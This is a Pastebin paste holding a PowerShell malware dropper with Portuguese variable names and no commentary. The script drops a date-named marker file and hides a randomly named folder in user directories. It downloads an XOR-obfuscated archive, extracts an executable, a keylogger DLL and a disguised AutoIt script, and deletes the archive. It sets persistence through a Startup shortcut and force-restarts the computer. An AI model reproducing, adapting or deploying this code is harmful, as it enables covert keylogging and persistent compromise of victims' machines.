Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $strCaminhoArquivoLog = "$env:TEMP\$([System.DateTime]::Now.ToString('yyyyMMdd'))"
- $bExisteArquivoLog = [System.IO.File]::Exists($strCaminhoArquivoLog)
- function gera-strrand
- {
- -join ((65..90) + (97..122) | Get-Random -Count $args[0] | % {[char]$_})
- }
- if (-Not $bExisteArquivoLog)
- {
- "" | Set-Content $strCaminhoArquivoLog
- $NomePasta = gera-strrand 3
- $Directory = "." + $NomePasta
- $array = (0..6)
- $array[0] = [environment]::getfolderpath("MyDocuments")
- $array[1] = [environment]::getfolderpath("MyMusic")
- $array[2] = [environment]::getfolderpath("MyPictures")
- $array[3] = [environment]::getfolderpath("Templates")
- $array[4] = "$env:USERPROFILE\Microsoft\Windows"
- $array[5] = "$env:USERPROFILE\Microsoft\ProgramData"
- $array[6] = "$env:USERPROFILE\Microsoft"
- $Num = Get-Random -Maximum 6
- $strCaminhoPastaCaixa = $array[$Num] + "\" + $Directory + "\"
- New-Item -ItemType directory -Path $strCaminhoPastaCaixa
- $strCaminhoCaixaZipada = gera-strrand 8
- $strCaminhoCaixaZipada = "$strCaminhoPastaCaixa$strCaminhoCaixaZipada.zip"
- $strUrlCaixaZipada = "AXXXXXXXXXA"
- (New-Object System.Net.WebClient).DownloadFile($strUrlCaixaZipada, $strCaminhoCaixaZipada)
- $objBytesCaixaZipada = [System.IO.File]::ReadAllBytes($strCaminhoCaixaZipada)
- for($i=0; $i -lt $objBytesCaixaZipada.count; $i++)
- {
- $objBytesCaixaZipada[$i] = $objBytesCaixaZipada[$i] -bxor 0x91
- }
- [System.IO.File]::WriteAllBytes($strCaminhoCaixaZipada,$objBytesCaixaZipada)
- $objArrayArqsZip = New-Object System.Collections.ArrayList
- $objShelApplication = New-Object -com shell.application
- $objArquivoZipado = $objShelApplication.NameSpace($strCaminhoCaixaZipada)
- foreach($item in $objArquivoZipado.items())
- {
- $objShelApplication.Namespace($strCaminhoPastaCaixa).copyhere($item, 0x14)
- $objArrayArqsZip.Add($item.name)
- }
- $strNomeModuloDllKl = "imgengine"
- $strExtModuloDllKl = "dll"
- $strNomeModuloDllKl = $strNomeModuloDllKl + "." + $strExtModuloDllKl
- $strPathModuloDllKl = $strCaminhoPastaCaixa + $strNomeModuloDllKl
- $strNomeModuloExecutor = gera-strrand 5
- $strNomeModuloExecutor = $strNomeModuloExecutor + ".exe"
- $strPathModuloExecutor = $strCaminhoPastaCaixa + $strNomeModuloExecutor
- $strNomeScriptAutoIt = "sptdintf.dll"
- $strPathScriptAutoIt = $strCaminhoPastaCaixa + $strNomeScriptAutoIt
- foreach ($element in $objArrayArqsZip)
- {
- $NomeArquivo = (Get-Item "$strCaminhoPastaCaixa$element").Name
- if ($NomeArquivo -eq "1")
- {
- Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloExecutor
- }
- elseif ($NomeArquivo -eq "2")
- {
- Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathScriptAutoIt
- }
- elseif ($NomeArquivo -eq "3")
- {
- Rename-Item -Path "$strCaminhoPastaCaixa$element" -NewName $strPathModuloDllKl
- }
- }
- Start-Sleep -s 5
- Remove-Item -Path $strCaminhoCaixaZipada -Force
- $strNomeLNK = $env:UserName
- $objShell = New-Object -ComObject ("WScript.Shell")
- $startup = [environment]::getfolderpath("Startup")
- $objShortCut = $objShell.CreateShortcut($startup + "\" + $strNomeLNK + ".lnk")
- $objShortCut.TargetPath = $strPathModuloExecutor
- $objShortCut.Arguments = ""
- $objShortCut.WorkingDirectory = $strCaminhoPastaCaixa
- $objShortCut.WindowStyle = 1
- $objShortCut.Hotkey = "CTRL+SHIFT+F"
- $objShortCut.IconLocation = "Shell32.dll, 29";
- $objShortCut.Description = gera-strrand 50
- $objShortCut.Save()
- Restart-Computer -F
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
